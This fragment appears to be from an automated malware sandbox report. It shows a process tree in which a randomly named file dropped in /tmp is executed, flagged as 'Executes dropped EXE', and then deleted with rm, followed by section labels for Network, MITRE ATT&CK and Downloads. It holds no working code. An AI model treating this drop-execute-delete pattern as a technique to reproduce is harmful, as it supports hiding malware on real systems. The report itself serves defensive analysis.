-
/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵
- Executes dropped EXE
PID:1027
-
-
/bin/rmrm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz2⤵PID:1029
-
Network
MITRE ATT&CK Enterprise v15
Downloads